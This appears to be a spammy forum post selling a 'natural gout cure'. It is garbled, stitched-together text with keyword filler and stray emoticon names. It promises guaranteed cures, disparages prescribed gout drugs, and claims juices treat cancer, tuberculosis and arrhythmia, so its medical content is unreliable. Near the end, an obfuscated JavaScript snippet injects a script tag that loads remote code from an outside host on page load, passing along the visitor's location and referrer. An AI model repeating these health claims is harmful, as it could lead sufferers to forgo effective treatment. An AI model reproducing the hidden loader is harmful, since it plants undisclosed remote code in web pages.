remedies for gout

Answers about home remedy gout

You are not connected. Please login or register

Natural Gout Cure: Cure Gout, Lose Weight and Decrease

View previous topic View next topic Go down  Message [Page 1 of 1]

Admin

Admin

Gout Cure Treatment

Few years ago, my friend Greg approached me about his arthritic problem of gout! He told me about his daily battle with the pain associated with gout! He also mentioned how going to bed (typically when a gout attack occurs) was more like a chore than a pleasure! Can you relate with Greg? The pain, the misery, the dread of the next attack! Or do you know a loved one who suffers from this painful disease?

Do you want a simple step-by-step natural gout cures treatment that is guaranteed to work? Are you sick of popping pills to 'band-aid' the pain? Wink

Gout can be a Life and Death Ailment If Left Untreated!

I immediately made a phone call to Greg to check up! Greg followed our simple Natural Gout Cure and cured his gout, lost over 20 pounds and his blood pressure was over 15 points lower! I jokingly told him that he will be our 'cure gout poster child'.

But like Greg (who has been gout free for almost 8 months now), you can naturally cure gout with simple gout remedies and gout prevention cures! And an added bonus, if you live a gout free lifestyle, I guarantee that you will lose weight and decrease your chance of heart disease in the process.

You know anything about gout, you would guess that Greg was the perfect candidate for this arthritic condition. Greg was 30 pounds overweight, had a sedentary lifestyle (a sitting job), didn't exercise, typically ate high carb/fat meals, loved his beer and was 38 years old. I later realized, I probably could have approached him about wanting to try our natural gout cure as opposed to him coming to me.

Here is a list of some basic tips if you or a loved one is suffering from gout! ) Maintain Your Healthy Weight! ) Avoid Eating Meats (Purines)!

Let Me Explain!

Curing Gout and Decreasing Your Chance of Heart Disease My career is centered around health! Therefore, my favorite part of the newspaper is the 'Health' Section. And while reading the daily paper, I noticed an article about gout! "Gout Increases Risk of Coronary Heart Disease". I instantly flipped the page and thought 'duh'. But, after thinking about my friend Greg, his family, our friendship, his life... I immediately flipped back arkansas tech university article! Rolling Eyes

European study reported a 16 year follow-up of over 9,000 men between 41 and 63 who entered the study with no evidence of coronary heart disease (CHD). After the study follow-up, most men continued to suffer with gout attacks but also were considered high risk for coronary heart disease. And as you might know, 1 out of every 5 deaths is associated with heart disease.

• ) Drink half your weight in water!
  • In ounces that is!
  • I weight 180 pounds so I would drink 90 ounces of water per day!
  • Roughly, 11 cups of water per day! Embarassed
  • How did he do it?
  • He was pro-active about curing gout and began living a healthy lifestyle!
  • And you can too! A Natural Gout Cure- No mediations needed and NO side-effects

Causes and Cures Phlebitis Causes and Top 10 Natural Remedies Deep

And finally, if you want to follow the same path that Greg and hundreds of other ex-gout sufferers followed, please take a few seconds to consider:

And the Kicker!

Men with gout were about 50% more likely to die from an acute heart attack than those men without gout! With millions of gout hospital visits each year, and over 500,000 coronary deaths per year... Can you understand the seriousness of gout?

• ) Avoid or limit Alcohol Consumption. ) Exercise on a daily basis!
  • Try to get at least 15 minutes of activity per day. Rolling Eyes
  • Do you want to discover how you can cure the pain and not hide it?
  • Are you tired of wasting over 200 dollars on a hospital visits and over-priced medication?
  • There is a unique combination of vitamins, minerals and other healthy substances in each juice.
  • You just need to know what juice to choose to treat your health problems. Idea
  • Pomegranate juice is great for recovering after serious disease or surgery and helps with anemia.
  • Red currant juice is recommended for the cardiovascular system, ulcer, skin diseases, rheumatism, a cold, and gout and gravel disease. Smile
  • Cucumber juice returns blood pressure to normal and improves the health of your teeth, gums, nails and hair.
  • It is used as a diuretic.
  • A mix of cucumber juice and carrot juice will help with rheumatism and will prevent atherosclerosis and parodontosis.
  • The mix will also improve your memory.
  • Keep your mind open to anything when reading about Gout.
  • Opinions may differ, but it is the base of Gout that is important. Wink
  • Carrot juice improves vision, strengthens your body and helps you recover after severe disease or mental or physical exhaustion.
  • It heals stomach ulcers and helps with anemia, cancer and tuberculosis.
  • Carrot juice will increase your appetite and strengthen your teeth and your immune system.
  • Accept the way things are in life.
  • Only then will you be able to accept these points on Gout.
  • Gout can be considered to be part and parcel of life.
  • Black currant juice is great for lack of vitamins, anemia, gastritis with low acidity, bronchitis, flu and angina.
  • It fights viruses, strengthens your immune system and is very rich in vitamin C.
  • Ignorance is bliss they say.
  • However, do you find this practical when you read so much about Gout?

Pear Juice Has Anti Inflammatory Effect and Helps With Kidney Stones

Pineapple juice is good for the kidney and liver function and has bromelain that is a natural fat burner and helps to rejuvenate your body. Also, pineapple juice is recommended for treating angina. Make the best use of life by learning and reading as much as possible. read about things unknown, and more about things known, like about Gout.

Cherry juice helps with constipation, improves your metabolism, strengthens your immune system, increases your appetite and is used to clear your throat if you cough.

Apricot Juice Strengthens the Heart Muscles

Drinking it regularly will help with heart arrhythmia. Beet juice is great for constipation, anemia and heart and alimentary canal diseases. It cleanses your body and lowers blood pressure. Start taking it in small doses (1 table spoon) or mix it with carrot juice. Gradually decrease the amount of carrot juice in the mix. Keep beet juice in your refrigerator for a few hours before drinking.

Cabbage juice is used for gastritis with low acidity, stomach ulcers and liver and spleen diseases. It strengthens blood vessels; stimulates cell regeneration of the mucous membrane of the alimentary canal, returns fat metabolism back to normal and helps with healing sores. Evil or Very Mad

Grape Juice Helps With Fatigue and Stress

It cleanses kidneys and the liver and lowers cholesterol. Grapefruit juice is a a natural treatment for gout. why you need to make strawberries part of your gout diet plan. It lowers cholesterol and returns your blood pressure to normal. Surprised.

• Orange juice is a powerful natural anti carcinogenic and anti cancerous remedy.
  • Peach juice strengthens heart muscles and cures heart arrhythmia.
  • It helps with anemia and gastritis intensification.

Gout is a Common Disease and Often Presents Suddenly With a Painful Joint

The most common and well-recognized symptom is swelling of the joint in the big toe where it joins the foot. This can be extremely painful and enlarged and if not treated the pain will last about 10 days and can cause lasting damage with repeated attacks. The area can be red, hot, inflamed and very painful or tender. Idea

The definite diagnosis or determining if the arthritis is due to gout may involve drawing fluid from the joint and looking for crystals of uric acid.

• Over the long term there can be deformity of joints and there can be many large lumps under the skin.
  • Nowadays with proper treatment this is less likely.
  • The symptoms can last from three to ten days and often get better even without treatment.
  • The next attack may occur many months or even years later.
  • Usually (and fortunately) only one joint is affected at a time and the symptoms of the swelling and pain start within a day.
  • Kidney stones can form due to gout and can cause back pain.
  • Other joints such as the knee, fingers and heel can also be affected.
  • Some people get lumps on the rim of the ear or other parts of the body near joints under the skin and these are called tophi.

People May Have an Elevated Uric Acid Also Called Hyperuricemia but Have No Symptoms

Later they may develop acute gouty arthritis where the joint is affected. Almost three fourths of people with gout will develop it in the big toe at some point of time. In between attacks the gout is said to be in an interval or intercritical phase and finally some people get chronic tophaceous (with the tophi) gout.

• Are you wondering what is best home remedy for gout?
  • Are you part of the millions who want to naturally cure gout but are wondering where to start? Idea
  • And though gout is common today, you can cure gout by reversing the risk factors (alcohol and being overweight).
  • Specifically, gout can naturally be cured by changing simple lifestyle habits.

Unfortunately, this is the Same Thing that Happens When a Doctor Treats Gout

Because doctors will typically prescribe one of three types of medicinal treatments; Traditional treatments include Non-Steroidal Anti-Inflammatory Drugs (NSAIDs); Corticosteroids; and Colchicines. Though all of these treatments will numb the pain, none of the treatments will cure the cause of gout, high uric acid levels. To discover a list of major side-effects of traditional treatments, please visit our Home Remedy for Gout website.

• Exercise, obviously! - I recently read an article of over 1,000 benefits from exercise.
  • And can you believe it, they forgot to list that exercise will eventually help you cure gout.
  • By lowering your Body Mass Index (BMI) and maintaining a healthy body weight, you can naturally cure gout!

To Cure Gout is to Reverse the Risk-factors Gout has been around for 3000 years and was even known as the 'disease of kings' because many kings would get the arthritis from their luxurious lifestyles. Being that gout is caused from being overweight and excessive alcohol consumption, it was no wonder most kings were stricken with gout. Though many treatments have been tried over the last 30 centuries, most treatments that WORK would be considered under the category of 'natural health'.

Home Remedy for Gout

Cure gout in hours, guaranteed! Allow Joe Barton and Barton Publishing to help you with a 100% guaranteed, research-based, doctor-approved Home Remedy for Gout! Visit us today for your toe's sake!

3. Drink half your body weight- You should be drinking half your body weight in ounces of water per day. That means if you weigh 200 lbs. you should be drinking 100 ounces of water per day. That equates to 12 glasses of water per day. Water is a natural flusher and essential for optimal health! Embarassed

5. Vitamins! It has been documented that Vitamin C has been shown to help reduce uric acid levels in the body. Thus, resulting in less gout acute attacks. We also recommend finding a quality multi-vitamin for supplementing. Very Happy.

However, by naturally curing gout with simple lifestyle habit changes, you can decrease uric acid levels (cause of gout) and naturally cure gout permanently. The following is a list gout natural health medical doctor recommends to our customers. Give yourself a momentary pause while reading what there is to read here on Purines. Use this pause to reflect on what you have so far written on Purines. Evil or Very Mad

• By choosing to take any of the following treatments, you can actually cause more harm to the affected joint and not even realize it.
  • Though your brain might be telling you that 'it doesn't hurt'; your joint might be 'screaming with pain'. Rolling Eyes

2. Limit Alcohol- Alcohol has also shown to raise the uric acid levels in the body. You should never drink more than 2 alcoholic drinks per day. The key is to keep the uric acid levels down.

• Natural Health Gout Tips 1.

• Avoid Animal Protein-

• Meat from animals typically contains a high number of purines which will cause your uric levels to shoot through the roof.
  • In order to decrease the likelihood of an attack, avoid foods high in purines.
  • Our Naturally Cure Gout website gives a list of foods to avoid and a list of foods you should eat!
  • The information available on Decrease Uric Acid is infinite.
  • There just seems to be so much to learn about, and to write about on Decrease Uric Acid.

Naturally Cure Gout vs. a Doctor's Prescription I am not completely opposed to prescription medications but in some cases prescriptions do more harm than good! Especially, when it comes to treating gout!

Imagine a Man With a Brain Tumor Who is Always Getting Headaches

The man continues to take aspirin, prescribed by his doctor, to relieve the headache only to find out that his migraine returns. Though the doctor continues to prescribe aspirin; the pain reliever will NEVER cure the brain tumor. In fact, the brain tumor will only get worse if drastic measures are not taking. Rolling Eyes

You Most Likely Have Already Seen a Doctor about Your Arthritic Condition?

Though doctors might prescribe a 'hefty' pain medication, this is not a cure! Pain medications are meant to help you deal with the pain and will never fully treat or cure the gout problem you are dealing with. In fact, the only way to cure gout is to use simple, effective natural health tips that have been around since King David ruled. Seriously!

var c2="gout";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

View user profile http://cortezz.forumotion.com

View previous topic View next topic Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum